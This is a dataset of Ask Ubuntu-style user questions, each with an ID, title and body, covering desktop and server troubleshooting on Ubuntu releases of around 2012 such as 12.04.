140007	does firefox support hardware acceleration on ubuntu ?	after i have installed ubuntu 12.04 lts ( 32 bits ) , firefox 12 works fine but without hardware acceleration . needless to say i have the latest nvidia 's proprietary drivers installed and my firefox preferences , on `` advanced '' tab , `` browsing '' section , have the option `` use hardware acceleration when available '' checked . i have tried the following things before asking this question : creating a boolean key `` webgl.force-enabled '' and set it to true on firefox 's page about : config ; starting a new profile like commented on thread mozilla firefox 12 is very slow on ubuntu 12.04 lts ; i have updated my nvidia driver to version 295.53 . and none of this have worked . as you can see below in my firefox 's page about : support report , `` graphics '' section shows no `` gpu accelerated windows '' : adapter description nvidia corporation -- geforce gtx 460/pcie/sse2 vendor id nvidia corporation device id geforce gtx 460/pcie/sse2 driver version 4.2.0 nvidia 295.53 webgl renderer nvidia corporation -- geforce gtx 460/pcie/sse2 -- 4.2.0 nvidia 295.53 gpu accelerated windows 0 azurebackend skia i use the following site to test hardware acceleration : http : //ie.microsoft.com/testdrive/performance/fishbowl/ on windows 7 i get 60 fps even with 1,750 fishes on browser 's full screen mode ( 1680x1050x32bit-color ) . on ubuntu 12.04 lts , same nvidia drivers ( as shown in report ) , wo n't go faster than 15 fps with only 1,000 fishes . can anybody help me ?
140008	find the installation directory of opencv	i need to find the installation directory of opencv so that i can add it 's path to pkg_config_path so i can run opencv programs the problem is i do n't know where to look for it since i 'm completely new to ubuntu . i 'm using ubuntu 10.04 any help would be appreciated.thanks ! ! !
140010	upgrading ubuntu with some thing which can make more than one connection	i wan na upgrade my ubuntu from 11.04 to 12.04 , but the internet is so slow when i use synaptic or update manager , because they only make one connection to download packages like wget . ( 6 ~ 7kbps ) . but when i use axel to download my speed is 160 kbps . now i 'm upgrading and it take 6days to be compelet by this speed . is there any way to force it to use more than one connection to get packages ?
140014	how to decompress 20gb of files ; tmpfs keeps filling up	i need to decompress huge files when i upload them into a software and it is failing . i thought the problem was with tmpfs . then i decided to use /tmp as tmpfs , but still failing . i can upload files that after decompression are smaller than 4.8gb , which is the tmpfs at /run . so how could i change it ? here is the df -h output : filesystem size used avail use % mounted on /dev/sda2 817g 3.9g 771g 1 % / udev 12g 4.0k 12g 1 % /dev tmpfs 100g 16k 100g 1 % /tmp tmpfs 4.8g 992k 4.8g 1 % /run none 5.0m 0 5.0m 0 % /run/lock none 12g 148k 12g 1 % /run/shm /dev/sdb2 2.6t 99g 2.4t 4 % /home /dev/sdc1 1.9t 1.6t 301g 84 % /media/my book thank you .
140019	how do you delete a folder that contains spaces ?	so i finally got my ubuntu box up and running , ran the lamp install , and successfully loaded up the apache2 webserver , and php5 . the one thing i did n't want is for ubuntu during the installation to take one whole 1tb drive that contained a ton of stuff , but it was a backup drive so no biggie . but now i was transferring pics to the /var/www location and it copied a directory that contains spaces . terminal seems to hang when i use the rm command , any ideas would be appreciated , thanks guys .
140021	ambience theme error on gnome classic ( 12.04 )	i 've just switched to gnome classic , but i see some errors with the ambience theme . attached a screenshot . see the tabs : http : //img20.imageshack.us/img20/1187/screenshotfrom201205210h.png thanks !
140023	re-install 12.04	i need to reinstall 12.04 from scratch and ca n't figure out how to do it . i had been running ubuntu 11. ? . when i upgraded to 12.04 , i found that i could not open pdfs and most video files will not play . you help would be appreciated . thanks .
140024	non intel half hight mini pci-e wifi ?	intel wifi cards seam to be suffering driver issues lately and i am looking for an alternative to the half hight card installed in my acer 3810tz . something i can use until these issues are sorted . which half hight mini pci-e cards work best in ubuntu 12.04 ?
140028	12.04 occasionally freezes when image viewer opens pictures , possibly graphics driver related ?	is this a widespread problem ? i ca n't find similar questions asked so it may not be . i use image viewer to sort all my photos . it was fine all the time i had 10.04 , but now with 12.04 after an indeterminate number of file openings it kind-of-freezes for a while . sometimes seconds , sometimes minutes . all the while it 's stuck , any music in playback will continue to the end of the track , then stop ; and while the mouse moves it 's glitchy and if you click on anything nothing happens until it un-freezes . i 've had the system monitor running while this happened , and all resource usage was low ( including memory and swap-partition- memory ~10 % and 0 use of swap ) . the data i 'm accessing is on a separate partition to os , but that 's common so i doubt relevant . i 'm running a default gfx driver until i can work out how to make the proper one for my system work , however surely it would n't be that ? no other applications seem to cause the same problem , including editing images in gimp which i 'd have thought would exercise the same gfx elements plus more . one thing i have noticed is it seems to occur more regularly in more elaborate front-ends . so it 's been worst in full unity , and probably least bad in gnome classic and lxde . but that could be coincidence ( or mis-remembering on my part ? ! ) for info i 'm running an intel core2 duo e4500 2.20ghz with 3gb ram . as nothing crashes ( app or system ) i 'm not sure any log files would be of use ? happy to inspect & post results up if there are any that might be useful in this case . so ... any ideas what could be the probem ?
140029	upgraded to 12.04 boots straight into command line	i just upgrader to 12.04 from 11.10 . the install appeared to go well but the computer goes through the usual boot with splash but the goes to the command line without a gui . how do i open the gui and fix this issue ?
140032	how do i get screen brightness controls to work with intel hd3000 graphics ?	tl ; dr version i 'm looking for a simple way to install a working graphics driver for my laptop ( via command line or system settings ) so that i can control the brightness and resolution . solution upgraded to 12.04 and followed instructions here : http : //askubuntu.com/a/126549/46766 . no special driver needed . additional detail i have an hp pavilion g7-1310us laptop with this integrated graphics processor i bought a few months ago . i have installed ubuntu 11.10 . but i have never got the display working properly . some specific symptoms : display settings list `` unknown '' can not dim screen with control keys no drivers listed under additional drivers i have found a few questions related to this graphics card but none of these help me resolved my problem : ati 6470m & intel hd graphics 3000 drivers ? intel hd 3000 ( sandy bridge ) 3d games problem video not recognized ? ubuntu 11.10 intel corporation 2nd generation core processor family integrated graphics controller specifically , i just want to be able to control the screen brightness and perhaps adjust the resolution . i see that intel lists a linux driver released on 2012/04/23 on their download site : downloadcenter.intel.com . but it recommends `` obtaining precompiled driver packages from your linux distribution vendor '' . i 'd like to install either though a simple command line command or through the additional drivers window under system settings . is this possible in either 11.10 or , if i upgrade , 12.04 ? thanks .
140033	recovering linux boot loader after reinstalling windows	i have a notebook in which i installed windows , and then linux on another partition . today , i had to reinstall windows and now i do n't have access to the boot menu when the computer boots . now i ca n't seem to get the grub boot menu , so i ca n't access my linux system . i have tried to follow these instructions from the ubuntu documentation , but i ca n't seem to get it . i ran the ubuntu live cd and 1 - i ca n't find boot-repair 2 - in the terminal , when i run fdisk -l , i get : /dev/sda1 - hpfs/ntfs/exfat /dev/sda2 - hpfs/ntfs/exfat /dev/sda3 - extended /dev/sda5 - hpfs/ntfs/exfat /dev/sda6 - hpfs/ntfs/exfat /dev/sda7 - linux swap / solaris please help , thanks
140037	trouble installing gnome-shell-extensions-user-theme , dependency/ppa conflict ?	i installed gnome tweak tool , and am trying to set up custom themes and whatnot . so , trying to install gnome-shell-extensions-user-theme . me @ computer : ~ $ sudo apt-get install gnome-shell-extensions-user-theme [ sudo ] password for me : reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : gnome-shell-extensions-user-theme : depends : gnome-shell-extensions-common but it is not going to be installed e : unable to correct problems , you have held broken packages . not going to be installed ? okay , let 's see about that ... me @ computer : ~ $ sudo apt-get install gnome-shell-extensions-common reading package lists ... done building dependency tree reading state information ... done gnome-shell-extensions-common is already the newest version . 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . wait , what ? broken packages ? ruh roh ! seems to me it might be a ppa contradiction problem or something , but i 'm tired of trashing my installs . kinda lost here . any ideas ? output of sudo apt-get install -f drex @ u110 : ~ $ sudo apt-get install -f reading package lists ... done building dependency tree reading state information ... done 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded .
140047	installing ubuntu on a 3 terabyte drive with 2 terabytes allocated to windows 7	is is possible to install ubuntu 12.04 onto a 3 terabyte drive that already has 2 terabytes allocated to windows 7 ultimate 64-bit ? what i would like to do it use the remaining 750 gb of unallocated space on the drive for ubuntu . if this is possible how would i go about completing this installation ?
140057	how to list all dependency problems ?	like being able to filter broken packages in synaptic , is there a way to list ( cli or gui ) all dependency problems ? or would dependency issues show up as broken ? i 'm confused because each time i install either libgd2-noxpm or libgd2-xpm i 'm getting the same error , with the packages reversed , of course : dpkg : libgd2-noxpm : dependency problems , but removing anyway as you requested : graphviz depends on libgd2-noxpm ( > = 2.0.36~rc1~dfsg ) | libgd2-xpm ( > = 2.0.36~rc1~dfsg ) ; however : package libgd2-noxpm is to be removed . package libgd2-xpm is not installed . libgraphviz4 depends on libgd2-noxpm ( > = 2.0.36~rc1~dfsg ) | libgd2-xpm ( > = 2.0.36~rc1~dfsg ) ; however : package libgd2-noxpm is to be removed . package libgd2-xpm is not installed . libm17n-0 depends on libgd2-noxpm ( > = 2.0.36~rc1~dfsg ) | libgd2-xpm ( > = 2.0.36~rc1~dfsg ) ; however : package libgd2-noxpm is to be removed . package libgd2-xpm is not installed . webalizer depends on libgd2-noxpm ( > = 2.0.36~rc1~dfsg ) | libgd2-xpm ( > = 2.0.36~rc1~dfsg ) ; however : package libgd2-noxpm is to be removed . package libgd2-xpm is not installed . for example when i try to install libgd2-xpm so it makes sense it would complain because it 's not installed until after the errors , but i just want to be able to list all dependency issues to make sure . any ideas ? or anyone know if dependency issues would in fact show up as broken ?
140058	tomboy in12.04 ubuntu add ins tags cant unfold	i have this problem in both gnote and tomboy i can not access the add ins from preference . i can click addins tab but once in there i see preference , tools , etc but i can not unfold any of these tags to allow them to work .when i click on triangle they just dont unfold to show addins .
140061	i am getting boot error after installation of ubuntu 12.04 lts	i am new user from window to ubuntu . i just had installed ubuntu 12.04 lts . i have 4 drives ntfs + 1 drive ( c : ) . c drive is 50-gb . i do n't want to remove other 4 drives which are on ntfs . i have deleted partition of c changes it to ext4 file system . i think i am doing mistake in `` advance partition mode '' ... because i do n't know , how to set `` mount point '' and `` primary or logical '' options for 1 ( 50-gb ) drive.. can you tell me what i do now . note : i have installed ubuntu 12.04 lts twice . every time i did fully format the drive . but the second time i get the boot error too .
140062	pasting libaacs.so.0 into vlc folder	i want to paste a codec `` libaacs.so.0 '' into my `` usr\lib\vlc '' folder , but every time i do it , i always get `` permission denied '' . please help thanks
140065	authentication password to install adobe to stream movies 11.10 system	i just purchased a computer with ubuntu from the university . they said it was freshly installed . i would like to stream media and watch dvd 's for one thing . i tried to install adobe , but i need a password to authenticate . i rebooted the system and went to where i saw root @ ubuntu : ~ # . it gave no options , just a flashing cursor . any help ? sudo is already installed .
140066	network manager wireless connection duplicated	i have a wireless network named `` sweet-home '' . ubuntu sees it all right and for some time everything went fine , but at some point in the dropdown menu `` sweet-home '' turned into submenu with two items in it : `` sweet-home '' and `` sweet-home 1 '' . is there a way i can clean this mess up and just have one `` sweet-home '' ?
140069	firefox deletes root protected files ?	when firefox starts , it creates two files in the user settings directory : places.sqlite-shm and places.sqlite-wal and deletes them upon exit . just for the experiment , i set the permissions of those files so that only root can read/write them . but when i closed firefox , those files got deleted ! how is that possible ? firefox is not running with root permissions ... do n't ask me why i 'm doing this , i 'm just curious
140070	formatting hard drive before installing ubuntu	i want to install ubuntu on my pc and i have windows xp already installed on it . while formatting the os will it erase on the data on other partitioned drives also or will erase on that partitioned drive which i will choose before installing . i have partition drive c , d and e respectively and windows xp os is installed in c drive . please suggest what to do i have not taken backup of files stores in d and e partitioned drive .
140076	unity launcher log	i 'm making a custom launcher/desktop file to place in the unity launcher bar . however , when i drag the launcher icon from ~/.local/share/applications , it disappears immediately . this is probably caused by a syntax error in my .desktop file . is there a unity log file i can look at to find what the problem is ?
140077	install build-essential without apt	i am not connected to the network and it seems i need build-essentials to get the drivers working . best i can do is transfer the packages by thumb drive . what is the process for offline installations of the package , and where can i download it ?
140080	playing blu-ray using vlc	i 've been searching for a way to play blu-ray using vlc on ubuntu 12.04 64bit and all of them tell me that i 've to somehow rip the disk into .mkv format then play it . but today , i found a page with directions on how to play blu-rays directly on vlc . i 've already finished downloading and pasting the files it told me to do , but it did n't work for me . then i found a page where someone had tried it and it worked for them . does anyone know how they got it to work ? the page with the directions . the page where it worked . i also found this does anyone know what it is talking about ? i 've already downloaded lxbdplayer , but i encountered a problem when installing the lcbdaacs plugins . are there any other ways to install the lxbdaacs plugin ?
140081	virtualbox does n't recognize usb	i have ubuntu 12.04 as host and win7 as guest . i installed virtualbox 4.1 and extension pack 4.1 from oracle website . i also enabled usb 2.0 from settings of my vm . my win7 vm does n't regconize usb ( flash drive and kindle fire ) . how to fix it ? update : i added my current user to vbusers group but it does n't work as well .
140086	remove memcached from ubuntu	i have install memcached from source using these commands cd /usr/local/src wget http : //danga.com/memcached/dist/memcached-1.2.4.tar.gz tar zxvf memcached-1.2.4.tar.gz cd memcached-1.2.4 ./configure make make install now i want to remove it , how can i remove it from ubuntu .
140088	ubuntu 11.10 server remote access	a it tech person set us up a ubuntu server 11.10 fileserver is there a way that you can remote access the file on the server , i know that it can me done but i 'm not sure if it have been setup . how to you know if it has been setup & how to access it . & is there a way reset the username & password as the it tech did n't tell use this information & if i call him back out to have a look at it , he will charge us $ 100 an hour .
140098	can not boot ubuntu 12.04 after dual-boot installation on hp xw8200	i have a 160gb drive and a 2tb drive ( both internal ) on a hp xw8200 i have windows xp on the 160 gb drive . partitioned a /boot 1gb , 10gb swap , 100gb / , and a 400gb /home on the 2tb drive . chose to install ubuntu 12.04 alongside xp , but just before the installation was complete , error about grub not being able to install . tried boot-repair , but still can not boot into ubuntu . pls . find details at http : //paste.ubuntu.com/998508/ your help would be greatly appreciated , balu
140109	change the synergy notification icon ?	i use synergy to sync mouse and keyboard between desktops . my question is , how do i change the synergy indicator icons in unity ? for reference , i am using the faenza icon theme , and this is what my indicator bar looks like in unity : i have made faenza styled replacements for the three icon states of synergy . connected example : i have tried : naming the icons synergy-connected , synergy-disconnected and warning respectively . i got these names from the icons used in synergy 's source files resizing icons ( to 16 , 22 , 24 and 32 ) and placing them in /usr/share/icons/faenza/status/xx replace xx with icon resolution placing the svg 's in /usr/share/icons/faenza/scalable the above two points , but instead in the faenza dark folder add the svg 's in ~/.icons thoughts : i have thought of adding the custom icons to the source , compiling said source and installing ... but that would defeat the purpose of icon themes and in the future i would want to use different icons with different icon themes without the hassle of compiling source each time ; i do n't think it is within the scope of this problem to consider compiling from source with custom icons .
140112	google-search lens for unity	is there any google search lens available for unity ? if yes how do i install it ?
140116	what digital diaries are available ?	i want an application which can be used as diary and event notifier with password protection.that application should have to run as autostart one . so what i wan na do is recording my daily things in there and it have to notify me when an event came to time . thanks in advance .
140121	sensors reporting incorrect temperatures	when i run sensors i get the following output : nouveau-pci-0068 adapter : pci adapter temp1 : +6618.0°c ( high = +100.0°c , crit = +110.0°c ) atk0110-acpi-0 adapter : acpi interface vcore voltage : +1.08 v ( min = +0.85 v , max = +1.60 v ) +3.3 voltage : +3.33 v ( min = +2.97 v , max = +3.63 v ) +5 voltage : +5.12 v ( min = +4.50 v , max = +5.50 v ) +12 voltage : +11.93 v ( min = +10.20 v , max = +13.80 v ) cpu fan speed : 1283 rpm ( min = 600 rpm ) chassis fan speed : 1048 rpm ( min = 600 rpm ) cpu temperature : +29.0°c ( high = +60.0°c , crit = +95.0°c ) mb temperature : +26.0°c ( high = +45.0°c , crit = +75.0°c ) k10temp-pci-00c3 adapter : pci adapter temp1 : +22.1°c ( high = +70.0°c ) ( crit = +99.5°c , hyst = +97.5°c ) that first temperature ( 6618.0c ) is clearly incorrect . this only started since upgrading to 12.04 . i do n't have a separate graphics card in the machine . ( in fact i did n't think i had one at all ! ) i 'm trying to plot these temperatures with munin , but having one that high makes it impossible to read the real temperatures . could anyone tell me how to fix this ? i 'm happy to just remove it altogether . i 've looked in /etc/sensors3.conf , but could n't find anything which seemed related to that particular measurement .
140122	android emulator-the sdk install and use flying over the brains	i am not a very advanced programer as such.. i want to try different android apps on my ubuntu 12.04 like whats app etc.. but unlike bluestacks for windows , there seems to be no emulator other than the android sdk for linux ... i downloaded the sdk , installed its tools and stuff ... but now its going over my head.. ! ! use of eclipse n what not.. ! ! i visited these pages- http : //developer.android.com/sdk/installing.html http : //developer.android.com/resources/tutorials/hello-world.html http : //crashcourse.ca/content/android-emulator-ubuntu-1004-60-seconds but i can not get what they are tring to tell me to do ... i would be thankfull if any other alternative was available or if not , if anyone could guide me through a step-wise tutorial ( with screenshots would be reaaly gr8 ) to install and make the sdk run ... really need it.. ! ! thanx.. ! !
140123	what is the difference between dhcp3-server and isc-dhcp-server packages ?	what is the difference between dhcp3-server and isc-dhcp-server packages in ubuntu 12.04 ?
140124	keyboard shortcuts in firefox do n't work as expected	previously , on ubuntu and other systems , the following shortcuts in firefox would work : ctrl + tab - switches between tabs ctrl + f4 - closes current tab since installing the mate desktop ( gnome 2 ) , the shortcuts do the following : ctrl + tab - does nothing ctrl + f4 - closes firefox i 've checked in the `` keyboard shortcuts '' section in mate , but neither of these are being overridden . compiz is n't installed . this is rather annoying .
140126	how do i configure a dhcp server ?	how to configure a dhcp server in ubuntu 12.04 ? i need a step-by-step tutorial if somebody has one .
140132	ubuntu 10.04 - problem creating xorg.conf for dualview	so far i found out that i need to configure the xorg.conf to have dualview on my monitor . at this moment the screen is just duplicated . my graphics card is matrox g550 . when trying jannis @ ariel : / $ sudo xorg -configure fatal server error : server is already active for display 0 if this server is no longer running , remove /tmp/.x0-lock and start again . please consult the the x.org foundation support at http : //wiki.x.org for help . ddxsiggiveup : closing log also /etc/x11/xorg.conf does n't exist.. since i allready tried it a several months ago , lost my x configuration and needed to reinstall the os i am terrified it can happen again . does anyone know what to do ? is there anyway to store the current/running configuration and restore it afterwards ?
140133	apache2 collecting unique visitors , how ?	i have a cloud server running apache2 for hosting my website , while attempting to monetise it , i keep getting asked to supply proof of unique visits per month . i know i could add code to log all this to my db , how ever this seems like a bit of an inefficient way of doing things . i 'm sure apache2 must log visits , so my question is , how do i monitor the unique visits with apache2 ? thanks .
140134	how do i delete the blue gnome wallpaper from my wallpaper selection in prefs ?	i just got rid of adwaita theme in my ubuntu install , but the blue striped wallpaper is still there , how do i find it and remove it manually or run command in terminal to delete it ?
140136	marking packages as non-removable / non-installable	my machine resides in a corporate domain and have cfengine installed , for automated configuration and maintenance purposes . configuration is pulled automatically into few thousand computers from one place , and my machine is just one of those . i 'm root and can change the system in the way i want , but do n't want to touch cfengine files at all . problem : adobe recently released a new flash version ( 11.2 ) that fixes some security issues , but i have version 11.0r1 . after new version release chrome wo n't automatically execute flash plugin , and shows the message every time i visit the page with a flash content : adobe flash player was blocked because it is out of date . along with message there are two buttons , run this time and update plug-in ... . both buttons works as expected , and update works as well . but after some short period of time new flash plugin is automatically removed from the machine and old flash package is installed back , because of cfengine , where old flash package is marked as mandatory . question : is it possible to tell apt that some particular packages are non-removable , or non-installable , so cfengine will fail installing old flash package while will succeed with others ? or any other ways of permanently updating flash ?
140138	qt installation missing compiler	i have used linux in the past but not for a long time and so i am a bit rusty so apologise if i am asking something obvious or in the wrong stackexchange site . there are a few things with regards to how i have to use ubuntu that are likely important : i have to use it virtually , so it is installed in a virtualbox i do not have access to an internet connection due to company policy . software is downloaded for me though so i can get hold of it as long as it is available as offline installers so , i have used the desktop version of ubuntu 12.4 lts x64 and an offline installer of qt . when i try to install qt it first complains about a missing c++ compiler : `` you need a c++ compiler . please install it using the system management tools '' i have , as far as i was aware , gcc installed as part of the ubuntu install but maybe this is something else i need . if i ignore all that it seems to install but only has the harmattan target available . leading me to think i am missing some software . any ideas what i need and how to get these as offline installations ? thanks
140139	some windows not showing up in alt + tab	i installed chromium from the software centre yesterday and realised it was n't showing up in alt + tab switching so i decided to go back to firefox . it turns out firefox also does n't show up , but only since installing chromium . also , neither show up as open in the launcher ( no little triangle ) so switching using that just opens a new window . gimp has the same problem . any ideas for a fix ?
140141	problem with drag and drop email in tomboy	when i click mail message in evolution and drag it into the open note either tomboy closes or comp freezes.. i have tried uninstall , restart multiple time it seems that the evolution plugin isnt working i use tomboy to track communication at work : i write time of calls subjects etc , , drop email related to a particular project into the note and when discussing the project i have all the communication available to me in one note , very very useful . i just upgraded 2 laptops to 12.04 ( actually both were clean install ) the same problem is present on both computers compaq presario and sony viao
140145	upgrade to 12.04 from 8.04	i have installed version 8.04 and need to upgrade to 12.04 ; in the upgrade manager , it just shows upgrade to 10.04 . is it possible to get straight to 10.04 or should i first upgrade to 10.04 then top 12.04 ? thanks , răšmi
140147	kde4-config not found ?	here 's my /etc/apt/sources.list : # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # official ubuntu repos # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # to use a mirror close to you ( i use the fastet ping configured with muon ) : # deb http : //mirror2.corbina.ru/ubuntu/ precise main restricted universe multiverse # deb http : //mirror2.corbina.ru/ubuntu/ precise-updates main restricted universe multiverse # # # # # # ubuntu main repos deb http : //mirror2.corbina.ru/ubuntu/ precise restricted multiverse deb-src http : //mirror2.corbina.ru/ubuntu/ precise main restricted universe multiverse # # # # # # ubuntu update repos deb http : //mirror2.corbina.ru/ubuntu/ precise-security main restricted universe multiverse deb http : //mirror2.corbina.ru/ubuntu/ precise-updates restricted multiverse deb http : //mirror2.corbina.ru/ubuntu/ precise-proposed main restricted universe multiverse deb http : //mirror2.corbina.ru/ubuntu/ precise-backports main restricted universe multiverse deb-src http : //mirror2.corbina.ru/ubuntu/ precise-security main restricted universe multiverse deb-src http : //mirror2.corbina.ru/ubuntu/ precise-updates main restricted universe multiverse deb-src http : //mirror2.corbina.ru/ubuntu/ precise-proposed main restricted universe multiverse deb-src http : //mirror2.corbina.ru/ubuntu/ precise-backports main restricted universe multiverse # # # # # # ubuntu partner repo deb http : //archive.canonical.com/ubuntu precise partner deb-src http : //archive.canonical.com/ubuntu precise partner # # # # # # ubuntu extras repo deb http : //extras.ubuntu.com/ubuntu precise main deb-src http : //extras.ubuntu.com/ubuntu precise main # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # unofficial repos # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # 3rd party binary repos # # # # google linux software repositories - http : //www.google.com/linuxrepositories/ # # run this command : wget -q https : //dl-ssl.google.com/linux/linux_signing_key.pub -o- | sudo apt-key add - deb http : //dl.google.com/linux/deb/ stable non-free # # # # kubuntu updates - https : //edge.launchpad.net/~kubuntu-ppa/+archive/ppa # # run this command : sudo apt-key adv -- keyserver keyserver.ubuntu.com -- recv-keys 8ac93f7a deb http : //ppa.launchpad.net/kubuntu-ppa/ppa/ubuntu precise main # # # # libreoffice - http : //www.documentfoundation.org/download/ # # run this command : sudo apt-key adv -- keyserver keyserver.ubuntu.com -- recv-keys 1378b444 deb http : //ppa.launchpad.net/libreoffice/ppa/ubuntu precise main # # # # medibuntu - http : //www.medibuntu.org/ # # run this command : sudo apt-get update & & sudo apt-get install medibuntu-keyring & & sudo apt-get update deb http : //packages.medibuntu.org/ precise free non-free # # # # qbittorrent - http : //qbittorrent.sourceforge.net/ # # run this command : sudo apt-key adv -- keyserver keyserver.ubuntu.com -- recv-keys 47b4d1c4 # deb http : //ppa.launchpad.net/hydr0g3n/ppa/ubuntu precise main # # # # # # # 3rd party source repos # # # # kubuntu updates ( source ) - https : //edge.launchpad.net/~kubuntu-ppa/+archive/ppa # # run this command : sudo apt-key adv -- keyserver keyserver.ubuntu.com -- recv-keys 8ac93f7a deb-src http : //ppa.launchpad.net/kubuntu-ppa/ppa/ubuntu precise main # # # # libreoffice ( source ) - http : //www.documentfoundation.org/download/ # # run this command : sudo apt-key adv -- keyserver keyserver.ubuntu.com -- recv-keys 1378b444 deb-src http : //ppa.launchpad.net/libreoffice/ppa/ubuntu precise main # # # # medibuntu ( source ) - http : //www.medibuntu.org/ # # run this command : sudo apt-get update & & sudo apt-get install medibuntu-keyring & & sudo apt-get update deb-src http : //packages.medibuntu.org/ precise free non-free i 've done sudo apt-get update , how come kde4-config package is not found ?
140148	how to safely remove default folders ?	in the file manager ( xubuntu 12.04 ) , there appear default folders which i do n't need ( like videos , music , ... ) . is it safe to remove them or might programs not work properly afterwards ( like on mac os x where i tried that once ) ? i found http : //ubuntuforums.org/showthread.php ? t=1851832 . is this the way one should remove these folders ?
140149	failed to create calibre library at : u/media/data/files/biblioth/xc3\xq8que calibre	calibre , version 0.8.38 error : failed to create library : failed to create calibre library at : u'/media/data/files/biblioth\xc3\xa8que calibre ' . traceback ( most recent call last ) : file `` /usr/lib/calibre/calibre/gui2/main.py '' , line 102 , in get_library_path os.makedirs ( library_path ) file `` /usr/lib/python2.7/os.py '' , line 150 , in makedirs makedirs ( head , mode ) file `` /usr/lib/python2.7/os.py '' , line 150 , in makedirs makedirs ( head , mode ) file `` /usr/lib/python2.7/os.py '' , line 157 , in makedirs mkdir ( name , mode ) oserror : [ errno 13 ] permission non accordã©e : '/media/data' please help i can n't read my ebooks .
140161	dark textures on intel hd 3000 sandy bridge in games via wine	looks like i have some problem here . i 'm trying to play some games on my notebook with ubuntu 12.04 . but all games i treed to play have dark textures . 2d objects ( like menus and buttons ) are not affected . example : http : //imageshack.us/f/571/20120521122055.png/
140167	gconf-tool2 command to set `` place windows '' compiz option ?	for operational reasons at work , i have access to gconf-tool2 but not ccsm . can anyone tell me what the option is called for teh purposes of calling gconf-tool2 to set the various `` place windows '' options ? cheers
140168	can not shutdown my sony vaio	i did a fresh install of ubuntu 12.04 ( dual boot with windows 7 ) on my sony vaio . after the fresh install everything was working fine . then i was informed that new driver were available for my ati video card ( i first tried to install the post-release one but it was not possible so i selected the one tested by canonical ) after that i noticed a bug where my laptop was rebooting instead of resuming from hibernate ( i.e if i was closing the lid .. the laptop was hibernating but if i was opening the lid the laptop was shutting down ) it was a bug i already experienced in 11.10 and i fixed it by amending the grub file from grub_cmdline_linux_default= '' quiet splash '' to grub_cmdline_linux_default= '' quiet splash acpi_sleep=nonvs '' ... the fix sorted out that issue but introduced a new issue .. now when i shutdown my laptop it hangs on the splash screen ( ubuntu logo with the 4 dots ) and nothing happens . i tried to use the following fix grub_cmdline_linux_default= '' quiet splash acpi=force splash acpi_sleep=nonvs '' but it is not working . any help in fixing this would be appreciated . ps : after 5 years using ubuntu this is the first time i am not able to find the solution within a week
140170	gcc compiling error for c++ program	when i 'm trying to compile a c++ program with gcc , it gives me following error : gcc : error trying to exec 'cc1plus ' : execvp : no such file or directory error : command 'gcc ' failed with exit status 1
140171	how can i get deja-dup to use my `` skydrive '' account instead of ubuntu one ?	wow can i set deja-dup to use my `` skydrive '' as the backup , since i have so much more storage ? any ideas or successful attempts ?
140180	problem installing wine on ubuntu 12.04	i have a problem with installing wine into my netbook running ubuntu 12.04 , it says that i need to insert the installation cd , but i installed ubuntu through my usb pendrive . how can i do for installing it ?
140186	is it possible to install ubuntu12.04 along side windows7 ?	it seems that when i go to install ubuntu , the only option i get is `` install inside windows 7 '' & the button says `` continue to restart '' . is it possible to install ubuntu side by side windows 7 ?
140197	i can ssh into a remote host but get `` connection reset by peer '' with sshfs , what do i miss ?	i created a key pair to connect to a synology disk from 12.04 . deployed , edit ~/.ssh/config to automatically use it . tested : ssh user @ remotesynology - > works like a charm . tested on a second remote machine ( running ubuntu server ) - > works . now tested : sshfs user @ theubuntuserver : /home/user/ubuntuserver - > works finally : sshfs user @ remotesynology : /home/user/remotesynology - > error : read : connection reset by peer i had a look at this issue , but that does n't seem to apply ( i have the user in the fuse group , and it works for the other machine ) and i do n't get a permission denied error . what do i miss ?
140200	how do i disable the screenshot sound ?	i am not holding a camera , i do not need to hear a shutter sound to know i pressed the print screen key . other suggestions on the site encourage people to disable event sounds , but i use these . so it something i can hack out of the sound theme ?
140207	migrating from thunderbird to microsoft outlook	is there a way to migrate from thunderbird running on ubuntu back to microsoft outlook running on windows 7 ?
140209	how to get alt+b and alt+l to work in the terminal ?	i 'm used to the terminal hot-keys alt+b to move forward one word and alt+l to move back one word . however , in the new unity of ubuntu 12.04 , this does n't seem to work as holding alt and pressing b instead open the help menu . i have been looking around , but to no avail . i was wondering if anyone else has this issue as well ?
140216	distro for `` prehistoric '' windows nt laptop ?	while doing some `` spring cleaning '' i found an extremely old laptop gathering dust , so i decided to resurrect it . it surprisingly still works flawlessly , on windows nt . i tried installing a few different linux distros , new and old , but i got all different kinds of errors . here are the specs : toshiba satellite 4030cdt ( 13.3 '' , c , winnt , 64 mb ram , 4.1 gb hdd ) intel celeron processor , no ethernet port ( forget about wifi lol ) dialup , no dvd drive , only cd and floppy any tips welcome ! : - )
140220	why ubuntu 12.04 operating system too slow.. ?	i was using ubuntu 10.10 from last year . every thing was ok with that . recently i 've installed ubuntu 12.04 in place of 10.10 , after installing that on my dell laptop , i started to feel uncomfortable . it to slow event if you move mouse then its feel like i 'll take 1min to move one place 2 another.. i know why this is happening , all because of 12.04 runs my cpu up to 99 % -100 % all over time . and there are 2-3 processes who use all the cpu.. like 1 . system_monitor 2. compiz i do n't know why its use all the cpu even other app ca n't able to run .. in ubuntu 10.10 every think was ok.. any solution for this problem.. ! ! | thank 's
